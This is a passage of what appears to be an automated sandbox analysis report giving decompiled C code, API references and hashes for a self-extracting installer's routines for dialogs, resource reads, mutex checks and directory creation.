                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 = 1;
                                                                                                                                                                                                        				_t10 = _t6 - 0x100;
                                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                                        					E001F43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                        					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                        					__eflags =  *0x1f9a40 - _t42; // 0x3
                                                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L36:
                                                                                                                                                                                                        					return _t42;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t10 == _t42) {
                                                                                                                                                                                                        					_t20 = _a12 - 1;
                                                                                                                                                                                                        					__eflags = _t20;
                                                                                                                                                                                                        					if(_t20 == 0) {
                                                                                                                                                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0x1f91e4, 0x104);
                                                                                                                                                                                                        						__eflags = _t21;
                                                                                                                                                                                                        						if(_t21 == 0) {
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							_t58 = 0x4bf;
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							E001F44B9(_t64, _t58);
                                                                                                                                                                                                        							goto L39;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t49 = 0x1f91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t23 =  *_t49;
                                                                                                                                                                                                        							_t49 =  &(_t49[1]);
                                                                                                                                                                                                        							__eflags = _t23;
                                                                                                                                                                                                        						} while (_t23 != 0);
                                                                                                                                                                                                        						__eflags = _t49 - 0x1f91e5 - 3;
                                                                                                                                                                                                        						if(_t49 - 0x1f91e5 < 3) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 =  *0x1f91e5; // 0x3a
                                                                                                                                                                                                        						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                        						if(_t24 == 0x3a) {
                                                                                                                                                                                                        							L21:
                                                                                                                                                                                                        							_t25 = GetFileAttributesA(0x1f91e4);
                                                                                                                                                                                                        							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                        							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        								L26:
                                                                                                                                                                                                        								E001F658A(0x1f91e4, 0x104, 0x1f1140);
                                                                                                                                                                                                        								_t27 = E001F58C8(0x1f91e4);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 != 0) {
                                                                                                                                                                                                        									__eflags =  *0x1f91e4 - 0x5c;
                                                                                                                                                                                                        									if( *0x1f91e4 != 0x5c) {
                                                                                                                                                                                                        										L30:
                                                                                                                                                                                                        										_t30 = E001F597D(0x1f91e4, 1, _t64, 1);
                                                                                                                                                                                                        										__eflags = _t30;
                                                                                                                                                                                                        										if(_t30 == 0) {
                                                                                                                                                                                                        											L35:
                                                                                                                                                                                                        											_t42 = 1;
                                                                                                                                                                                                        											__eflags = 1;
                                                                                                                                                                                                        											goto L36;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t42 = 1;
                                                                                                                                                                                                        										EndDialog(_t64, 1);
                                                                                                                                                                                                        										goto L36;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0x1f91e5 - 0x5c;
                                                                                                                                                                                                        									if( *0x1f91e5 == 0x5c) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L30;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t58 = 0x4be;
                                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t32 = E001F44B9(_t64, 0x54a, 0x1f91e4, 0, 0x20, 4);
                                                                                                                                                                                                        							__eflags = _t32 - 6;
                                                                                                                                                                                                        							if(_t32 != 6) {
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t33 = CreateDirectoryA(0x1f91e4, 0);
                                                                                                                                                                                                        							__eflags = _t33;
                                                                                                                                                                                                        							if(_t33 != 0) {
                                                                                                                                                                                                        								goto L26;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x1f91e4);
                                                                                                                                                                                                        							_t58 = 0x4cb;
                                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags =  *0x1f91e4 - 0x5c;
                                                                                                                                                                                                        						if( *0x1f91e4 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                        						if(_t24 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t34 = _t20 - 1;
                                                                                                                                                                                                        					__eflags = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						EndDialog(_t64, 0);
                                                                                                                                                                                                        						 *0x1f9124 = 0x800704c7;
                                                                                                                                                                                                        						goto L39;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t34 != 0x834;
                                                                                                                                                                                                        					if(_t34 != 0x834) {
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t37 = LoadStringA( *0x1f9a3c, 0x3e8, 0x1f8598, 0x200);
                                                                                                                                                                                                        					__eflags = _t37;
                                                                                                                                                                                                        					if(_t37 != 0) {
                                                                                                                                                                                                        						_t38 = E001F4224(_t64, _t46, _t46);
                                                                                                                                                                                                        						__eflags = _t38;
                                                                                                                                                                                                        						if(_t38 == 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0x1f87a0);
                                                                                                                                                                                                        						__eflags = _t39;
                                                                                                                                                                                                        						if(_t39 != 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t63 = 0x4c0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						E001F44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L38;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = 0x4b1;
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3313
                                                                                                                                                                                                        0x001f3318
                                                                                                                                                                                                        0x001f331a
                                                                                                                                                                                                        0x001f3331
                                                                                                                                                                                                        0x001f3332
                                                                                                                                                                                                        0x001f333a
                                                                                                                                                                                                        0x001f333d
                                                                                                                                                                                                        0x001f337c
                                                                                                                                                                                                        0x001f3388
                                                                                                                                                                                                        0x001f338f
                                                                                                                                                                                                        0x001f3394
                                                                                                                                                                                                        0x001f3396
                                                                                                                                                                                                        0x001f33a4
                                                                                                                                                                                                        0x001f33ab
                                                                                                                                                                                                        0x001f33b6
                                                                                                                                                                                                        0x001f33be
                                                                                                                                                                                                        0x001f33c3
                                                                                                                                                                                                        0x001f33c5
                                                                                                                                                                                                        0x001f3435
                                                                                                                                                                                                        0x001f3437
                                                                                                                                                                                                        0x001f3437
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3437
                                                                                                                                                                                                        0x001f33c7
                                                                                                                                                                                                        0x001f33c9
                                                                                                                                                                                                        0x001f33cc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f33cc
                                                                                                                                                                                                        0x001f33ad
                                                                                                                                                                                                        0x001f33b4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f33b4
                                                                                                                                                                                                        0x001f3398
                                                                                                                                                                                                        0x001f3399
                                                                                                                                                                                                        0x001f339b
                                                                                                                                                                                                        0x001f339c
                                                                                                                                                                                                        0x001f339d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f339d
                                                                                                                                                                                                        0x001f334c
                                                                                                                                                                                                        0x001f3351
                                                                                                                                                                                                        0x001f3354
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f335c
                                                                                                                                                                                                        0x001f3362
                                                                                                                                                                                                        0x001f3364
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3366
                                                                                                                                                                                                        0x001f3367
                                                                                                                                                                                                        0x001f3369
                                                                                                                                                                                                        0x001f336a
                                                                                                                                                                                                        0x001f336b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f336b
                                                                                                                                                                                                        0x001f331c
                                                                                                                                                                                                        0x001f3323
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3329
                                                                                                                                                                                                        0x001f332b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f332b
                                                                                                                                                                                                        0x001f324c
                                                                                                                                                                                                        0x001f324c
                                                                                                                                                                                                        0x001f324f
                                                                                                                                                                                                        0x001f32c8
                                                                                                                                                                                                        0x001f32ce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f32ce
                                                                                                                                                                                                        0x001f3251
                                                                                                                                                                                                        0x001f3256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3271
                                                                                                                                                                                                        0x001f3277
                                                                                                                                                                                                        0x001f3279
                                                                                                                                                                                                        0x001f3298
                                                                                                                                                                                                        0x001f329d
                                                                                                                                                                                                        0x001f329f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f32b0
                                                                                                                                                                                                        0x001f32b6
                                                                                                                                                                                                        0x001f32b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f32be
                                                                                                                                                                                                        0x001f3280
                                                                                                                                                                                                        0x001f3289
                                                                                                                                                                                                        0x001f328e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f328e
                                                                                                                                                                                                        0x001f327b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f327b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000003E8,001F8598,00000200), ref: 001F3271
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 001F33E2
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 001F33F7
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 001F3410
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000836), ref: 001F3426
                                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 001F342D
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 001F343F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$cent
                                                                                                                                                                                                        • API String ID: 2418873061-3152218896
                                                                                                                                                                                                        • Opcode ID: 50bb11186f9df2bcfd0e2c99637df501313abc332fffbbe6881812c16d672536
                                                                                                                                                                                                        • Instruction ID: 3f28f8cf24ef599aafbaabaec784ef7644786db711b4e9d8f5ace696a0ae8652
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 50bb11186f9df2bcfd0e2c99637df501313abc332fffbbe6881812c16d672536
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4517B7038424C77EB21AB355C8CF7B295DEF96B54F504028F729E65D0CFA88E41E261
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E001F2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				struct HRSRC__* _t31;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t13 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                        				_t65 = 0;
                                                                                                                                                                                                        				_t66 = __ecx;
                                                                                                                                                                                                        				_t48 = __edx;
                                                                                                                                                                                                        				 *0x1f9a3c = __ecx;
                                                                                                                                                                                                        				memset(0x1f9140, 0, 0x8fc);
                                                                                                                                                                                                        				memset(0x1f8a20, 0, 0x32c);
                                                                                                                                                                                                        				memset(0x1f88c0, 0, 0x104);
                                                                                                                                                                                                        				 *0x1f93ec = 1;
                                                                                                                                                                                                        				_t20 = E001F468F("TITLE", 0x1f9154, 0x7f);
                                                                                                                                                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                        					_t64 = 0x4b1;
                                                                                                                                                                                                        					goto L32;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                        					 *0x1f858c = _t27;
                                                                                                                                                                                                        					SetEvent(_t27);
                                                                                                                                                                                                        					_t64 = 0x1f9a34;
                                                                                                                                                                                                        					if(E001F468F("EXTRACTOPT", 0x1f9a34, 4) != 0) {
                                                                                                                                                                                                        						if(( *0x1f9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                        							L12:
                                                                                                                                                                                                        							 *0x1f9120 =  *0x1f9120 & _t65;
                                                                                                                                                                                                        							if(E001F5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                        								if( *0x1f8a3a == 0) {
                                                                                                                                                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                        									if(_t31 != 0) {
                                                                                                                                                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0x1f8184 != 0) {
                                                                                                                                                                                                        										__imp__#17();
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0x1f8a24 == 0) {
                                                                                                                                                                                                        										_t57 = _t65;
                                                                                                                                                                                                        										if(E001F36EE(_t65) == 0) {
                                                                                                                                                                                                        											goto L33;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t33 =  *0x1f9a40; // 0x3
                                                                                                                                                                                                        											_t48 = 1;
                                                                                                                                                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                        												if(( *0x1f9a34 & 0x00000100) == 0 || ( *0x1f8a38 & 0x00000001) != 0 || E001F18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t64 = 0x7d6;
                                                                                                                                                                                                        													if(E001F6517(_t57, 0x7d6, _t34, E001F19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                        														goto L33;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												L30:
                                                                                                                                                                                                        												_t23 = _t48;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t23 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E001F2390(0x1f8a3a);
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t64 = 0x520;
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								E001F44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 =  &_v268;
                                                                                                                                                                                                        							if(E001F468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        								goto L3;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                        								 *0x1f8588 = _t43;
                                                                                                                                                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(( *0x1f9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                        										_t64 = 0x524;
                                                                                                                                                                                                        										if(E001F44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                        											goto L12;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L11;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t64 = 0x54b;
                                                                                                                                                                                                        										E001F44B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                        										L11:
                                                                                                                                                                                                        										CloseHandle( *0x1f8588);
                                                                                                                                                                                                        										 *0x1f9124 = 0x800700b7;
                                                                                                                                                                                                        										goto L33;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t64 = 0x4b1;
                                                                                                                                                                                                        						E001F44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						 *0x1f9124 = 0x80070714;
                                                                                                                                                                                                        						L33:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x001f2e84
                                                                                                                                                                                                        0x001f2e8b
                                                                                                                                                                                                        0x001f2e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2e96
                                                                                                                                                                                                        0x001f2e96
                                                                                                                                                                                                        0x001f2e9e
                                                                                                                                                                                                        0x001f2ea2
                                                                                                                                                                                                        0x001f2eba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2ece
                                                                                                                                                                                                        0x001f2ede
                                                                                                                                                                                                        0x001f2eed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2eed
                                                                                                                                                                                                        0x001f2eef
                                                                                                                                                                                                        0x001f2eef
                                                                                                                                                                                                        0x001f2eef
                                                                                                                                                                                                        0x001f2eef
                                                                                                                                                                                                        0x001f2ea2
                                                                                                                                                                                                        0x001f2e86
                                                                                                                                                                                                        0x001f2e88
                                                                                                                                                                                                        0x001f2e88
                                                                                                                                                                                                        0x001f2e43
                                                                                                                                                                                                        0x001f2e48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2e48
                                                                                                                                                                                                        0x001f2e30
                                                                                                                                                                                                        0x001f2e30
                                                                                                                                                                                                        0x001f2ef8
                                                                                                                                                                                                        0x001f2f01
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2f01
                                                                                                                                                                                                        0x001f2d8a
                                                                                                                                                                                                        0x001f2d8f
                                                                                                                                                                                                        0x001f2da1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2da3
                                                                                                                                                                                                        0x001f2dae
                                                                                                                                                                                                        0x001f2db4
                                                                                                                                                                                                        0x001f2dbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2dca
                                                                                                                                                                                                        0x001f2dd3
                                                                                                                                                                                                        0x001f2df5
                                                                                                                                                                                                        0x001f2e02
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2dd5
                                                                                                                                                                                                        0x001f2dde
                                                                                                                                                                                                        0x001f2de3
                                                                                                                                                                                                        0x001f2e04
                                                                                                                                                                                                        0x001f2e0a
                                                                                                                                                                                                        0x001f2e10
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2e10
                                                                                                                                                                                                        0x001f2dd3
                                                                                                                                                                                                        0x001f2dbb
                                                                                                                                                                                                        0x001f2da1
                                                                                                                                                                                                        0x001f2d5b
                                                                                                                                                                                                        0x001f2d5b
                                                                                                                                                                                                        0x001f2d5d
                                                                                                                                                                                                        0x001f2d69
                                                                                                                                                                                                        0x001f2d6e
                                                                                                                                                                                                        0x001f2f06
                                                                                                                                                                                                        0x001f2f06
                                                                                                                                                                                                        0x001f2f06
                                                                                                                                                                                                        0x001f2d59
                                                                                                                                                                                                        0x001f2f18

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F2CD9
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F2CE9
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F2CF9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                          • Part of subcall function 001F468F: SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                          • Part of subcall function 001F468F: LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                          • Part of subcall function 001F468F: LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                          • Part of subcall function 001F468F: memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                          • Part of subcall function 001F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F2D34
                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 001F2D40
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 001F2DAE
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 001F2DBD
                                                                                                                                                                                                        • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 001F2E0A
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                        • API String ID: 1002816675-2654900392
                                                                                                                                                                                                        • Opcode ID: b6f5a0698bf9cba314d1eb00520754142b0b0223b33320dd2db3ffb28be1f979
                                                                                                                                                                                                        • Instruction ID: a0d522d68e9be38e132178c5c75f4c7a7c99ed6c0d1939fc33a1d15843dce24e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6f5a0698bf9cba314d1eb00520754142b0b0223b33320dd2db3ffb28be1f979
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F5138B030430DABE724B7749D4AB7B3698EB95710F244039FB45D65E2EFB88C81C621
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                                                        			E001F34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				struct HWND__* _t35;
                                                                                                                                                                                                        				struct HWND__* _t38;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t9 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *0x1f91d8 = 1;
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                                        					L21:
                                                                                                                                                                                                        					EndDialog();
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				_pop(1);
                                                                                                                                                                                                        				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                        					if(_a12 != 0x1b) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t13 = _t12 - 0xe;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t35 = _a4;
                                                                                                                                                                                                        					 *0x1f8584 = _t35;
                                                                                                                                                                                                        					E001F43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                        					__eflags =  *0x1f8184; // 0x1
                                                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
